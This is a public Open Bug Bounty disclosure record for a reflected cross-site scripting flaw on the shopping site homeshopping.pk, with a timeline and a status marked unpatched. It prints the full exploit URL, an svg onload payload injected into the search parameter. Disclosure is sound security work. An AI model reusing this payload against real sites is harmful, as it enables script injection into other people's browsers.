homeshopping.pk XSS vulnerability

2016-12-16T13:43:00
ID OBB:198211
Type openbugbounty
Reporter Wanted4Bug
Modified 2016-12-26T07:13:00

Description

Vulnerable URL:
https://homeshopping.pk/search.php?search={q=%22%3E%3Csvg%2Fonload%3Dprompt(%2FOPENBUGBOUNTY%2F)%3E}&__cf_waf_tk__=0491040028PIif-cA5J4TkzKL2BIkkD0gROs
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 22352
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 16 December, 2016 13:43 GMT
Vulnerability existence verified and confirmed| 19 December, 2016 06:33 GMT
Generic security notifications sent to website owner| 19 December, 2016 06:33 GMT
Vulnerability details disclosed by researcher| 26 December, 2016 07:13 GMT